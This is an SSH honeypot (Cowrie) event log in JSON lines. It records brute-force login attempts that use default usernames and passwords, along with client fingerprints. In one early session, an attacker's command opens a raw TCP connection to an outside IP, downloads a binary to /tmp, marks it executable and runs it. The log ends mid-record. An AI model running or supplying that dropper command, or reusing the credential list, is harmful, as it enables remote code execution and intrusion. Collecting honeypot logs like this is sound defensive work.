{"eventid":"cowrie.login.success","username":"root","password":"password","message":"login attempt [root/password] succeeded","sensor":"my-vps","timestamp":"2025-09-08T15:07:24.989782Z","src_ip":"8.138.136.155","session":"eeb851ff42b6"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-08T15:07:25.442490Z","src_ip":"8.138.136.155","session":"eeb851ff42b6"}
{"eventid":"cowrie.command.input","input":"cat /bin/echo","message":"CMD: cat /bin/echo","sensor":"my-vps","timestamp":"2025-09-08T15:07:25.444454Z","src_ip":"8.138.136.155","session":"eeb851ff42b6"}
{"eventid":"cowrie.command.input","input":"nohup bash -c \"exec 6<>/dev/tcp/129.144.180.26/60107 && echo -n 'GET /linux' >&6 && cat 0<&6 > /tmp/YXAWFBb2kB && chmod +x /tmp/YXAWFBb2kB && /tmp/YXAWFBb2kB 8OxeyrOawc/X6/TZzd6As8ZZ/ICF/k/EpYbBycD38N7QyIaxyl/9hYnsXs6ymsHK2uv01s7ehr3GWfyAgftPxKWFw8bA9PbY0MGBvsZZ/ICA/Zre4cFMi6NyITv+z4xTP8c9jhIrSl4=\" &","message":"CMD: nohup bash -c \"exec 6<>/dev/tcp/129.144.180.26/60107 && echo -n 'GET /linux' >&6 && cat 0<&6 > /tmp/YXAWFBb2kB && chmod +x /tmp/YXAWFBb2kB && /tmp/YXAWFBb2kB 8OxeyrOawc/X6/TZzd6As8ZZ/ICF/k/EpYbBycD38N7QyIaxyl/9hYnsXs6ymsHK2uv01s7ehr3GWfyAgftPxKWFw8bA9PbY0MGBvsZZ/ICA/Zre4cFMi6NyITv+z4xTP8c9jhIrSl4=\" &","sensor":"my-vps","timestamp":"2025-09-08T15:07:31.651404Z","src_ip":"8.138.136.155","session":"eeb851ff42b6"}
{"eventid":"cowrie.command.input","input":"head -c 1458464 > /tmp/2n1j1b9reN","message":"CMD: head -c 1458464 > /tmp/2n1j1b9reN","sensor":"my-vps","timestamp":"2025-09-08T15:07:31.654797Z","src_ip":"8.138.136.155","session":"eeb851ff42b6"}
{"eventid":"cowrie.command.input","input":"cat /bin/echoQtd#UPX!","message":"CMD: cat /bin/echoQtd#UPX!","sensor":"my-vps","timestamp":"2025-09-08T15:07:31.863873Z","src_ip":"8.138.136.155","session":"eeb851ff42b6"}
{"eventid":"cowrie.command.input","input":">yoA@/;'8ELFP;i2","message":"CMD: >yoA@/;'8ELFP;i2","sensor":"my-vps","timestamp":"2025-09-08T15:07:31.868430Z","src_ip":"8.138.136.155","session":"eeb851ff42b6"}
{"eventid":"cowrie.command.input","input":"","message":"CMD: ","sensor":"my-vps","timestamp":"2025-09-08T15:07:31.871758Z","src_ip":"8.138.136.155","session":"eeb851ff42b6"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/65eb16cd4924d5b199ee1ee40c9a9c97f4bc37fa21f1b846f22b6a530bad036a","size":1964,"shasum":"65eb16cd4924d5b199ee1ee40c9a9c97f4bc37fa21f1b846f22b6a530bad036a","duplicate":false,"duration":"6.4","message":"Closing TTY Log: var/lib/cowrie/tty/65eb16cd4924d5b199ee1ee40c9a9c97f4bc37fa21f1b846f22b6a530bad036a after 6.4 seconds","sensor":"my-vps","timestamp":"2025-09-08T15:07:31.872995Z","src_ip":"8.138.136.155","session":"eeb851ff42b6"}
{"eventid":"cowrie.session.closed","duration":"9.3","message":"Connection lost after 9.3 seconds","sensor":"my-vps","timestamp":"2025-09-08T15:07:31.874366Z","src_ip":"8.138.136.155","session":"eeb851ff42b6"}
{"eventid":"cowrie.session.connect","src_ip":"185.255.91.51","src_port":49564,"dst_ip":"1.2.3.4","dst_port":22,"session":"f28b0d3c821a","protocol":"ssh","message":"New connection: 185.255.91.51:49564 (1.2.3.4:22) [session: f28b0d3c821a]","sensor":"my-vps","timestamp":"2025-09-08T15:07:34.230088Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-08T15:07:34.233841Z","src_ip":"185.255.91.51","session":"f28b0d3c821a"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-08T15:07:34.330202Z","src_ip":"185.255.91.51","session":"f28b0d3c821a"}
{"eventid":"cowrie.login.failed","username":"postgres","password":"2025","message":"login attempt [postgres/2025] failed","sensor":"my-vps","timestamp":"2025-09-08T15:07:34.763417Z","src_ip":"185.255.91.51","session":"f28b0d3c821a"}
{"eventid":"cowrie.session.closed","duration":"1.6","message":"Connection lost after 1.6 seconds","sensor":"my-vps","timestamp":"2025-09-08T15:07:35.865685Z","src_ip":"185.255.91.51","session":"f28b0d3c821a"}
{"eventid":"cowrie.session.connect","src_ip":"158.51.124.56","src_port":41236,"dst_ip":"1.2.3.4","dst_port":22,"session":"30a06fa60578","protocol":"ssh","message":"New connection: 158.51.124.56:41236 (1.2.3.4:22) [session: 30a06fa60578]","sensor":"my-vps","timestamp":"2025-09-08T15:07:42.663699Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-08T15:07:42.664672Z","src_ip":"158.51.124.56","session":"30a06fa60578"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-08T15:07:42.802852Z","src_ip":"158.51.124.56","session":"30a06fa60578"}
{"eventid":"cowrie.login.failed","username":"webadmin","password":"2025","message":"login attempt [webadmin/2025] failed","sensor":"my-vps","timestamp":"2025-09-08T15:07:43.399843Z","src_ip":"158.51.124.56","session":"30a06fa60578"}
{"eventid":"cowrie.session.closed","duration":"1.9","message":"Connection lost after 1.9 seconds","sensor":"my-vps","timestamp":"2025-09-08T15:07:44.540327Z","src_ip":"158.51.124.56","session":"30a06fa60578"}
{"eventid":"cowrie.session.connect","src_ip":"217.72.205.35","src_port":54654,"dst_ip":"1.2.3.4","dst_port":22,"session":"dc87dd3b4bf5","protocol":"ssh","message":"New connection: 217.72.205.35:54654 (1.2.3.4:22) [session: dc87dd3b4bf5]","sensor":"my-vps","timestamp":"2025-09-08T15:08:33.496194Z"}
{"eventid":"cowrie.session.closed","duration":"0.0","message":"Connection lost after 0.0 seconds","sensor":"my-vps","timestamp":"2025-09-08T15:08:33.497455Z","src_ip":"217.72.205.35","session":"dc87dd3b4bf5"}
{"eventid":"cowrie.session.connect","src_ip":"13.86.105.19","src_port":49742,"dst_ip":"1.2.3.4","dst_port":22,"session":"0e25c4c87248","protocol":"ssh","message":"New connection: 13.86.105.19:49742 (1.2.3.4:22) [session: 0e25c4c87248]","sensor":"my-vps","timestamp":"2025-09-08T15:08:37.904695Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-09-08T15:08:37.905565Z","src_ip":"13.86.105.19","session":"0e25c4c87248"}
{"eventid":"cowrie.client.kex","hassh":"084386fa7ae5039bcf6f07298a05a227","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1;aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,arcfour256,arcfour128,aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,arcfour256,arcfour128;hmac-sha2-256,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1"],"keyAlgs":["ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-rsa","ssh-dss","ssh-ed25519","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","arcfour256","arcfour128","aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","arcfour256","arcfour128"],"macCS":["hmac-sha2-256","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 084386fa7ae5039bcf6f07298a05a227","sensor":"my-vps","timestamp":"2025-09-08T15:08:38.030737Z","src_ip":"13.86.105.19","session":"0e25c4c87248"}
{"eventid":"cowrie.session.connect","src_ip":"13.86.105.19","src_port":49754,"dst_ip":"1.2.3.4","dst_port":22,"session":"2d5718df99b8","protocol":"ssh","message":"New connection: 13.86.105.19:49754 (1.2.3.4:22) [session: 2d5718df99b8]","sensor":"my-vps","timestamp":"2025-09-08T15:08:38.288733Z"}
{"eventid":"cowrie.client.version","version":"MGLNDD_1.2.3.4_22","message":"Remote SSH version: MGLNDD_1.2.3.4_22","sensor":"my-vps","timestamp":"2025-09-08T15:08:38.289874Z","src_ip":"13.86.105.19","session":"2d5718df99b8"}
{"eventid":"cowrie.session.closed","duration":"0.0","message":"Connection lost after 0.0 seconds","sensor":"my-vps","timestamp":"2025-09-08T15:08:38.290491Z","src_ip":"13.86.105.19","session":"2d5718df99b8"}
{"eventid":"cowrie.session.connect","src_ip":"185.255.91.51","src_port":43570,"dst_ip":"1.2.3.4","dst_port":22,"session":"9093fc2b1f65","protocol":"ssh","message":"New connection: 185.255.91.51:43570 (1.2.3.4:22) [session: 9093fc2b1f65]","sensor":"my-vps","timestamp":"2025-09-08T15:08:38.521210Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-08T15:08:38.522491Z","src_ip":"185.255.91.51","session":"9093fc2b1f65"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-08T15:08:38.616668Z","src_ip":"185.255.91.51","session":"9093fc2b1f65"}
{"eventid":"cowrie.login.failed","username":"es","password":"Password1","message":"login attempt [es/Password1] failed","sensor":"my-vps","timestamp":"2025-09-08T15:08:39.037889Z","src_ip":"185.255.91.51","session":"9093fc2b1f65"}
{"eventid":"cowrie.session.closed","duration":"1.6","message":"Connection lost after 1.6 seconds","sensor":"my-vps","timestamp":"2025-09-08T15:08:40.135121Z","src_ip":"185.255.91.51","session":"9093fc2b1f65"}
{"eventid":"cowrie.session.connect","src_ip":"158.51.124.56","src_port":38786,"dst_ip":"1.2.3.4","dst_port":22,"session":"0a7d633f5da0","protocol":"ssh","message":"New connection: 158.51.124.56:38786 (1.2.3.4:22) [session: 0a7d633f5da0]","sensor":"my-vps","timestamp":"2025-09-08T15:08:43.045965Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-08T15:08:43.046921Z","src_ip":"158.51.124.56","session":"0a7d633f5da0"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-08T15:08:43.186989Z","src_ip":"158.51.124.56","session":"0a7d633f5da0"}
{"eventid":"cowrie.login.failed","username":"jira","password":"12345678","message":"login attempt [jira/12345678] failed","sensor":"my-vps","timestamp":"2025-09-08T15:08:43.790179Z","src_ip":"158.51.124.56","session":"0a7d633f5da0"}
{"eventid":"cowrie.session.closed","duration":"1.9","message":"Connection lost after 1.9 seconds","sensor":"my-vps","timestamp":"2025-09-08T15:08:44.932045Z","src_ip":"158.51.124.56","session":"0a7d633f5da0"}
{"eventid":"cowrie.session.closed","duration":"10.0","message":"Connection lost after 10.0 seconds","sensor":"my-vps","timestamp":"2025-09-08T15:08:47.904882Z","src_ip":"13.86.105.19","session":"0e25c4c87248"}
{"eventid":"cowrie.session.connect","src_ip":"158.51.124.56","src_port":36344,"dst_ip":"1.2.3.4","dst_port":22,"session":"71426eb9c75a","protocol":"ssh","message":"New connection: 158.51.124.56:36344 (1.2.3.4:22) [session: 71426eb9c75a]","sensor":"my-vps","timestamp":"2025-09-08T15:09:42.736709Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-08T15:09:42.737617Z","src_ip":"158.51.124.56","session":"71426eb9c75a"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-08T15:09:42.877407Z","src_ip":"158.51.124.56","session":"71426eb9c75a"}
{"eventid":"cowrie.login.failed","username":"sqldba","password":"sqldba@123","message":"login attempt [sqldba/sqldba@123] failed","sensor":"my-vps","timestamp":"2025-09-08T15:09:43.478823Z","src_ip":"158.51.124.56","session":"71426eb9c75a"}
{"eventid":"cowrie.session.closed","duration":"1.9","message":"Connection lost after 1.9 seconds","sensor":"my-vps","timestamp":"2025-09-08T15:09:44.620842Z","src_ip":"158.51.124.56","session":"71426eb9c75a"}
{"eventid":"cowrie.session.connect","src_ip":"185.255.91.51","src_port":36920,"dst_ip":"1.2.3.4","dst_port":22,"session":"0d625188cf0a","protocol":"ssh","message":"New connection: 185.255.91.51:36920 (1.2.3.4:22) [session: 0d625188cf0a]","sensor":"my-vps","timestamp":"2025-09-08T15:09:46.688565Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-08T15:09:46.725145Z","src_ip":"185.255.91.51","session":"0d625188cf0a"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-08T15:09:46.822363Z","src_ip":"185.255.91.51","session":"0d625188cf0a"}
{"eventid":"cowrie.login.failed","username":"dixi","password":"09N1RCa1Hs31","message":"login attempt [dixi/09N1RCa1Hs31] failed","sensor":"my-vps","timestamp":"2025-09-08T15:09:47.219989Z","src_ip":"185.255.91.51","session":"0d625188cf0a"}
{"eventid":"cowrie.session.closed","duration":"1.6","message":"Connection lost after 1.6 seconds","sensor":"my-vps","timestamp":"2025-09-08T15:09:48.321166Z","src_ip":"185.255.91.51","session":"0d625188cf0a"}
{"eventid":"cowrie.session.connect","src_ip":"158.51.124.56","src_port":33902,"dst_ip":"1.2.3.4","dst_port":22,"session":"e4cfebedf9aa","protocol":"ssh","message":"New connection: 158.51.124.56:33902 (1.2.3.4:22) [session: e4cfebedf9aa]","sensor":"my-vps","timestamp":"2025-09-08T15:10:45.660484Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-08T15:10:45.661682Z","src_ip":"158.51.124.56","session":"e4cfebedf9aa"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-08T15:10:45.801189Z","src_ip":"158.51.124.56","session":"e4cfebedf9aa"}
{"eventid":"cowrie.login.failed","username":"master","password":"Welcome1","message":"login attempt [master/Welcome1] failed","sensor":"my-vps","timestamp":"2025-09-08T15:10:46.398353Z","src_ip":"158.51.124.56","session":"e4cfebedf9aa"}
{"eventid":"cowrie.session.closed","duration":"1.9","message":"Connection lost after 1.9 seconds","sensor":"my-vps","timestamp":"2025-09-08T15:10:47.541813Z","src_ip":"158.51.124.56","session":"e4cfebedf9aa"}
{"eventid":"cowrie.session.connect","src_ip":"185.255.91.51","src_port":45824,"dst_ip":"1.2.3.4","dst_port":22,"session":"009ecc9e6e9e","protocol":"ssh","message":"New connection: 185.255.91.51:45824 (1.2.3.4:22) [session: 009ecc9e6e9e]","sensor":"my-vps","timestamp":"2025-09-08T15:11:00.209729Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-08T15:11:00.210794Z","src_ip":"185.255.91.51","session":"009ecc9e6e9e"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["h